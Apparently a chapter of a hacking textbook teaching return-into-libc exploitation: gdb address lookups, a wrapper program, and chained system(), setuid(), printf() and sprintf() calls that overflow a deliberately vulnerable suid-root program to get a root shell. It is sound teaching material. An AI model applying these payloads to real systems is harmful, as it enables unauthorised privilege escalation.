0x2b0 Returning into libc

Most applications never need to execute anything on the stack, so an obvious defense against buffer-overflow exploits is to make the stack non-executable. When this is done, shellcode existing anywhere on the stack is basically useless. This type of defense will stop the majority of exploits out there, and it is becoming more popular. The latest version of OpenBSD has a non-executable stack by default.

Of course, there is a corresponding technique that can be used to exploit programs in an environment with a non-executable stack. This technique is known as returning into libc. Libc is the standard C library, which contains various basic functions, like printf() and exit(). These functions are shared, so any program that uses the printf() function directs execution into the appropriate location in libc. An exploit can do the exact same thing and direct a program's execution into a certain function in libc. The functionality of the exploit is limited by the functions in libc, which is a significant restriction when compared to arbitrary shellcode. However, nothing is ever executed on the stack.

0x2b1 Returning into system()

One of the simplest libc functions to return into is system(). This function takes a single argument and executes that argument with /bin/sh. For this example, the simple vulnerable program vuln2.c will be used.

The general idea is to get the vulnerable program to spawn a shell, without executing anything on the stack, by returning into the libc function system(). If this function is supplied with the argument of "/bin/sh", this should spawn a shell.

$ cat vuln2.c
int main(int argc, char *argv[])
{
      char buffer[5];
      strcpy(buffer, argv[1]);
      return 0;
}
$ gcc -o vuln2 vuln2.c
$ sudo chown root.root vuln2
$ sudo chmod u+s vuln2

First, the location of the system() function in libc must be determined. This will be different for every system, but once the location is known, it will remain the same until libc is recompiled. One of the easiest ways to find the location of a libc function is to create a simple dummy program and debug it, like this:

$ cat > dummy.c
int main()
{
system();
}
$ gcc -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048406
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048406 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x42049e54 <system>
(gdb) quit

Here a dummy program is created that uses the system() function. After it's compiled, the binary is opened in a debugger and a breakpoint is set at the beginning. The program is executed, and then the location of the system() function is displayed. In this case, the system() function is located at 0x42049e54.

Armed with that knowledge, program execution can be directed into the system() function of libc. However, the goal here is to cause the vulnerable program to execute system("/bin/sh") to provide a shell, so an argument must be supplied. When returning into libc, the return address and function arguments are read off the stack in what should be a familiar format: the return address followed by the arguments. On the stack, the return-into-libc call should look something like this:

    [ function address ] [ return address ] [ argument 1 ] [ argument 2 ] ...

Directly after the address of the desired libc function is the address where execution should return to after the libc call. After that return address are all of the function arguments in sequence.

In this case, it doesn't really matter where the execution returns to after the libc call, because it will be opening an interactive shell. Therefore, these 4 bytes can just be a placeholder value of "FAKE". There is only one argument, which should be a pointer to the string /bin/sh. This can be stored anywhere in memory; an environment variable is an excellent candidate.

$ export BINSH="/bin/sh"
$ ./gtenv BINSH
BINSH is located at 0xbffffc40
$

So the system() address is 0x42049e54, and the address for the "/bin/sh" string will be 0xbffffc40 when the program is executed. That means the return address on the stack should be overwritten with a series of addresses, beginning with 0x42049e54, followed by FAKE (because it doesn't matter where execution goes after the system() call), and concluding with 0xbffffc40.

Prior experience with the vuln2 program has shown that the return address on the stack is overwritten by the eighth word of the program input, so seven words of dummy data are used for spacing.

$ ./vuln2 `perl -e 'print "ABCD"x7 . "\x54\x9e\x04\x42FAKE\x40\xfc\xff\xbf";'`
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$ ls -l vuln2
-rwsrwxr-x    1 root    root    13508 Apr 16 22:10 vuln2
$

The system() call worked, but it didn't provide a root shell, even though the vuln2 program was suid root. This is because system() executes everything through /bin/sh, which drops privileges. There must be a way around this.

0x2b2 Chaining Return into libc Calls

In a BugTraq post, Solar Designer suggested chaining libc calls so a setuid() executes before the system() call to restore privileges. This chaining can be done by taking advantage of the return address value that was previously ignored. The following series of addresses will chain a call from setuid() to system(), as shown in this illustration:

    [ setuid() address ] [ system() address ] [ setuid() argument ] [ system() argument ]

The setuid() call will execute with its argument. Because it's only expecting one argument, the argument for the system() call (the fourth word) will be ignored. After it's finished, execution will return to the system() function, which will use its argument as expected.

The idea of chaining calls is quite clever, but there are other problems inherent in this method of restoring privileges. The setuid() function expects an unsigned integer argument, so in order to restore root-level privileges, this value must be 0x00000000. Unfortunately, the chain is still delivered as a string through strcpy(), which stops copying at the first null byte. Avoiding the use of null bytes, the lowest value that can be used for this argument is 0x01010101, which has a decimal value of 16843009. While this isn't quite the desired result, the concept of chaining calls is still important and worth the practice.

$ cat > dummy.c
int main() { setuid(); }
$ gcc -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048406
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048406 in main ()
(gdb) p setuid
$1 = {<text variable, no debug info>} 0x420b5524 <setuid>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$ ./vuln2 `perl -e 'print "ABCD"x7 .
"\x24\x55\x0b\x42\x54\x9e\x04\x42\x01\x01\x01\x01\x40\xfc\xff\xbf";'`
sh-2.05a$ id
uid=16843009 gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$

The address of the setuid() function is determined the same way as before, and the chained libc call is set up as described previously. The setuid() argument is the \x01\x01\x01\x01 word in the command above. As expected, the uid is set to 16843009, but this is still far from a root shell. Somehow, a setuid(0) call must be made without terminating the string early with null bytes.

0x2b3 Using a Wrapper

One simple and effective solution is to create a wrapper program. This wrapper will set the user ID (and group ID) to 0 and then spawn a shell. This program doesn't need any special privileges, because the vulnerable suid root program will be executing it.

In the following output, a wrapper program is created, compiled, and used.

$ cat > wrapper.c
int main()
{
setuid(0);
setgid(0);
system("/bin/sh");
}
$ gcc -o /hacking/wrapper wrapper.c
$ export WRAPPER="/hacking/wrapper"
$ ./gtenv WRAPPER
WRAPPER is located at 0xbffffc71
$ ./vuln2 `perl -e 'print "ABCD"x7 . "\x54\x9e\x04\x42FAKE\x71\xfc\xff\xbf";'`
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
Segmentation fault
$

As the preceding results show, privileges are still being dropped. Can you figure out why?

The wrapper program is still being executed with system(), which executes everything through /bin/sh. This will drop privileges as the wrapper is executed, because /bin/sh drops privileges. However, a more direct execution function, like execl(), doesn't use /bin/sh and therefore shouldn't drop privileges. This effect can be tested and confirmed quickly with a few test programs.

$ cat > test.c
int main()
{
system("/hacking/wrapper");
}
$ gcc -o test test.c
$ sudo chown root.root test
$ sudo chmod u+s test
$ ls -l test
-rwsrwxr-x    1 root    root       13511 Apr 17 23:29 test
$ ./test
sh-2.05a$ id
uid=500(matrix) gid=500(matrix) groups=500(matrix)
sh-2.05a$ exit
exit
$
$ cat > test2.c
int main()
{
execl("/hacking/wrapper", "/hacking/wrapper", 0);
}
$ gcc -o test2 test2.c
$ sudo chown root.root test2
$ sudo chmod u+s test2
$ ls -l test2
-rwsrwxr-x    1 root    root       13511 Apr 17 23:33 test2
$ ./test2
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(matrix)
sh-2.05a# exit
exit
$

The test programs confirm that a root shell will be spawned if the wrapper program is executed with execl() from a setuid root program. Unfortunately, execl() is a more complex function than system(), especially for returning into libc. The system() function only requires a single argument, but the execl() call will require three arguments, the last of which must be four null bytes (to terminate the argument list). But the first null byte will terminate the string early, causing a dilemma similar to what we had before. Can you think of a solution?

0x2b4 Writing Nulls with Return into libc

Obviously, to make a clean execl() call, there must be some other call before it to write the 4-byte word of nulls. I spent a decent amount of time searching through all of the libc functions, looking for a likely candidate for this task. Finally my search converged on the printf() function. You should be familiar with this function by now from the format-string exploits. The use of direct parameter access allows the function to access only the function arguments it needs, which is helpful when chaining libc calls. Also, the %n format parameter stores the number of bytes output so far, so when nothing has been printed before it, it neatly writes four null bytes. The complete chained call looks something like this:

    [ printf() address ] [ execl() address ] [ address of "%3$n" ] [ address of "/hacking/wrapper" ] [ address of "/hacking/wrapper" ] [ address of this word ]

First, the printf() function executes with four arguments, but the use of direct parameter access in the format string found in the first argument causes the function to skip over the second and third arguments. Because the final argument is its own address, the four null bytes will overwrite that argument. Then the execution will return into the execl() function, which will use three arguments as expected, the third argument neatly terminating the argument list with a null.

So now that there's a plan, the addresses for the libc functions need to be found, and some strings need to be put into memory.

$ cat > dummy.c
int main() { printf(0); execl(); }
$ gcc -g -o dummy dummy.c
$ gdb -q dummy
(gdb) break main
Breakpoint 1 at 0x8048446: file dummy.c, line 1.
(gdb) run
Starting program: /hacking/dummy

Breakpoint 1, 0x08048446 in main () at dummy.c:1
1       int main() { printf(0); execl(); }
(gdb) p printf
$1 = {<text variable, no debug info>} 0x4205a1b4 <printf>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x420b4e54 <execl>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$
$ export WRAPPER="/hacking/wrapper"
$ export FMTSTR="%3\$n"
$ env | grep FMTSTR
FMTSTR=%3$n
$ ./gtenv FMTSTR
FMTSTR is located at 0xbffffedf
$ ./gtenv WRAPPER
WRAPPER is located at 0xbffffc65
$

The preceding investigation has provided every address needed except the last argument, which must be the address that this very word will occupy in memory once the chain has been copied onto the stack. That is the address of the buffer variable plus 48 bytes: 28 bytes of garbage for spacing, followed by 20 bytes for the five preceding words of the return-into-libc chain (the amount of garbage data needed for spacing may differ depending on your system's stack). One of the easiest ways to get this address is to simply add a debugging statement to the vulnerable program's source code and recompile it.

$ cat vulnD.c
int main(int argc, char *argv[])
{
   char buffer[5];
   printf("buffer is at %p\n", buffer);    // debugging
   strcpy(buffer, argv[1]);
   return 0;
}
$ gcc -o vulnD vulnD.c
$ ./vulnD test
buffer is at 0xbffffa80
$ ./vulnD `perl -e 'print "ABCD"x13;'`
buffer is at 0xbffffa50
Segmentation fault
$ pcalc 0xfa50 + 48
        64128           0xfa80                0y1111101010000000
$

With the debugging statement added (the line marked // debugging), the address of the buffer variable is printed. Presumably, the buffer will be in the same location when the very similar vuln2 program is executed.

However, the length of the program's argument will change the location of the buffer variable. During the exploit, the argument will consist of 13 words (52 bytes) of data. A fake argument with the same length can be used to get the correct buffer address. Then 48 can be added to the buffer address to provide the location of the third execl() argument, where the null word should be written.

With all the addresses known and strings loaded into environment variables, the exploitation is easy.

$ ./vuln2 `perl -e 'print "ABCD"x7 . "\xb4\xa1\x05\x42" . "\x54\x4e\x0b\x42" .
"\xdf\xfe\xff\xbf" . "\x65\xfc\xff\xbf" . "\x65\xfc\xff\xbf" .
"\x80\xfa\xff\xbf";'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=500(matrix)
sh-2.05a# exit
exit

0x2b5 Writing Multiple Words with a Single Call

Format strings married with return-into-libc calls can also provide a way to write multiple words with a single call. If it isn't possible to create a wrapper program, a root shell can still be spawned by chaining three libc calls. The sprintf() function works just like printf(), but it outputs to a string designated by its first argument. This can be used to write two 4-byte words with a single call, which will be necessary for three calls to chain properly. The chain will actually modify itself during execution.

The before and after versions look something like this (words counted from 1):

    Before:  [ sprintf() address ] [ setuid() address ] [ address of word 3 ] [ address of format string ] [ address of "/bin/sh" ] [ address of word 4 ]
    After:   [ sprintf() address ] [ setuid() address ] [ system() address ]  [ 0x00000000 ]               [ address of "/bin/sh" ] [ address of word 4 ]

The sprintf() call will happen first, parsing the format string to write the 4-byte value of 0 over the address of the format string. Then the rest of the string, containing the address of system(), is written to the address of the first argument, which overwrites itself. After the sprintf() call, the middle two words will be overwritten, and execution will return into the setuid() function. This will execute using the newly written null word as its argument, setting root privileges and finally returning into the newly written address for the system() function, which will execute the shell.

$ echo "int main(){sprintf(0);setuid();system();}">d.c;gcc -o d.o d.c;gdb -q d.o;rm d.*
(gdb) break main
Breakpoint 1 at 0x8048476
(gdb) run
Starting program: /hacking/d.o

Breakpoint 1, 0x08048476 in main ()
(gdb) p sprintf
$1 = {<text variable, no debug info>} 0x4205a234 <sprintf>
(gdb) p setuid
$2 = {<text variable, no debug info>} 0x420b5524 <setuid>
(gdb) p system
$3 = {<text variable, no debug info>} 0x42049e54 <system>
(gdb) quit
The program is running. Exit anyway? (y or n) y
$ export BINSH="/bin/sh"
$ export FMTSTR="%2\$n`printf "\x54\x9e\x04\x42";`"
$ env | grep FMTSTR
FMTSTR=%2$nTB
$ ./gtenv BINSH
BINSH is located at 0xbffffc34
$ ./gtenv FMTSTR
FMTSTR is located at 0xbffffedd
$ ./vulnD `perl -e 'print "ABCD"x13;'`
buffer is at 0xbffffa60
Segmentation fault
$ pcalc 0xfa60 + 28 + 8
        64132            0xfa84          0y1111101010000100
$ pcalc 0xfa60 + 28 + 12
        64136            0xfa88          0y1111101010001000
$ ./vuln2 `perl -e 'print "ABCD"x7 . "\x34\xa2\x05\x42" . "\x24\x55\x0b\x42" .
"\x84\xfa\xff\xbf" . "\xdd\xfe\xff\xbf" . "\x34\xfc\xff\xbf" .
"\x88\xfa\xff\xbf";'`
sh-2.05a# id
uid=0(root) gid=500(matrix) groups=500(matrix)
sh-2.05a#

Once again, a dummy program containing the necessary functions is compiled and debugged to find the function addresses in libc. This time, the process is crammed into a single line.

Next, the format string containing the system() address and the /bin/sh string are put into memory via environment variables, and their respective addresses are calculated. Because the chain needs to modify itself, the address of the chain in memory must also be determined. This is done using vulnD, the version of the vuln2 program containing the debugging statement. Once the address of the beginning of the buffer is known, some simple calculations will reveal the addresses where the system() address and the null word should be written in the chain. Finally, it's just a matter of using these addresses to create the chain and then exploiting. This type of self-modifying chain allows for exploitation on systems with non-executable stacks, without the use of a wrapper program. Nothing but libc calls.

Once the basic concepts of exploiting programs are understood, countless variations are possible with a little bit of creativity. Because the rules of a program are all defined by its creators, exploiting a supposedly secure program is simply a matter of beating them at their own game. Newer defenses, such as stack guards and intrusion detection systems (IDSs), are clever attempts to compensate for these problems, but they aren't perfect either. A hacker's ingenuity tends to find the holes left in these systems. Just think of the things that they didn't think of.